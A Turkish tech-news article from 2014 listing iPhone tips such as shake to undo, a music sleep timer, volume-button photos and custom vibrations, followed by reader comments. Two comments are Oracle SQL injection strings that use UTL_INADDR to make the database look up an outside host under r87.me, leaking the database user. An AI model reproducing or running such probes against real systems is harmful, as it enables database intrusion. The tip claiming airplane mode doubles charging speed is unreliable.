iPhone İle Neler Yapılabilir

iPhone'larda kullanabileceğiniz mükemmel ipuçlarını sizin için derledik! iPhone ile yapabileceklerinize dair birçok makale bulunmakta. Ancak bizim sıraladıklarımızın çoğunu ilk defa duyuyor olabilirsiniz. İşte iPhone ile neler yapılabilir sorusunun en iyi yanıtları…
29 Ağustos 2014 18:07
iPhone İle Neler Yapılabilir

iPhone ile birçok büyülü şey yapılabilir. İşte iPhone’unun en beğenilen gizli bazı özellikleri;

 

1-Geri Almak İçin Sallayın

 

Yazarken bir hata mı yaptınız? Telaşa gerek yok. Telefonunuzu sallayın yeter!

 

 

2-Hızlı şarj

iPhone’unuzu ful doldurmanız gerekiyor ancak yeterli vaktiniz yok mu? Bunun için telefonunuzu uçak moduna alın ve şarja takın Normal süresinden iki kat daha hızlı şarj olacak!

 

 

3-Siri sizin için mail’lerinizi okusun

 

Biliyoruz, Siri henüz Türkçe değil ancak iOS 8 ile birlikte Türkçe Siri geleceği konuşuluyor. Eğer bu gerçekleşirse Siri’ye sihirli sözcüğü söylemenz yeterli: E-Mail’lerimi oku. Siri yüksek sesle maillerinizi okuyacaktır.

 

 

4-Otomatik zamanlayıcı ile müzik istediğiniz saatte kapansın

 

Eğer sizde mzik dinlemeden uyuyamayanlardansanız ve tüm gece müzik çalmasını istemiyorsanız bu özellik tam da sizin için! Resimde olduğu gibi bunu istediğiniz saate ayarlamak sizin elinizde.

 

 

5-Ses düğmesiyle fotoğraf çekin

 

Malum eldiven giydiğinizde iPhone’un ekranını kullanamıyorsunuz, mecbur çıkartacaksınız. Ancak resim çekmek için bunu yapmanıza gerek yok. Ses düğelerini kullanabilirsiniz!

 

 

6-Tek seferde birden fazla fotoğraf çekin

Eğer ekrandaki fotoğraf çekme düğmesine basılı tutarsanız tek seferde hızlı çekim ile birden fazla fotoğraf çekebilirsiniz. Hareketli nesneleri yakalamak için birebir!

 

 

7-Metin mesajlarının saatlerini görme

 

Bu da çok basit! Ekranı sola kaydırın bakalım ne olacak?

 

 

8-Daha detaylı takvim

 

Takvim uygulamasında telefonu yatay konumuna getirin, böylece daha detaylı bir görünüm elde edin.

 

 

9-Resim çekerken otofokus ve kilitlenme

 

Resim çekerken parmağınızla ekrana dokunup nereye odaklanacağını ayarlıyoruz, tamam, bu cepte. Ama telefonu titrettiğinizde odağın bozulma durumda tekrar dokunup ayarlıyorsunuz taki tutturana kadar. Bunun yerine ekrana basılı tutun ve üstte sarı harflerle “AE/AF Kilidi” çıkana kadar elinizi kaldırmayın. İşlem tamam!

 

 

10-Safarideki kısayol

 

Alında birçok kısaltma sayesinde bazı uzantıları yazmanıza gerek yok. Sadece nokta’ya basılı tutun ve elinizi kaldırmadan sürükleyip seçin.

 

 

11-Hızlıca yeni mail atın

 

Bunu az kişi biliyor olabilir. Sağ altta bulunan butona bastığınızda anında yeni mail sayfası açılacaktır. Bu işinize yarayabilir.

 

 

12-Titreşimi özelleştirin

 

Bunun için sırasıyla Ayarlar > Sesler > Zil Tonu > Titreşim > Yeni Titreşim Yarat’ı tıklayın ve parmağınızla kendinize özel bir titreşim yaratın!

 

 

13-Özel klavye kısayolları

 

Bunun için de sırasıyla Ayarlar > Genel > Klavye > Yeni Kestirme Ekle’yi tıklayın. Gerisi size kalmış!

 

 

14-Ekran kilidinizi harflerle oluşturun

Malum iPhone’u genelde herkes ekran kilidi 4 tane sayı üzerinden kuruyor. Ancak bunu kalvye zerinden de oluşturmanız mümkün. Bunun için Genel > Ayarlar > Parola ‘ya gidin ve buradan “Basit Parola” seçeneğini kapatın ve yeni şifrenizi oluşturun.

 

 

 

 

Mesaj, arama veya diğer bildirimleriniz için LED ışığını devreye sokabilirsiniz. Bunun için Ayarlar > Genel > Erişilebilirlik’e gidin ve aşağıya kaydırın. “Uyarı İçin LED Flaş” seçeneğini aktif hale getirin.

 

Bu ipuçlarını herkesle paylaşın, onlar da size bunun için teşekkür etsin !

 

incehesap

939920
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
11 Ocak 2018, Perşembe 14:07
Teşekkürler
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
11 Mayıs 2017, Perşembe 23:31
keşke resimlerde de türkçe görüntü olsa zormu bunu yapmak acaba
Bu haberler ilginizi çekebilir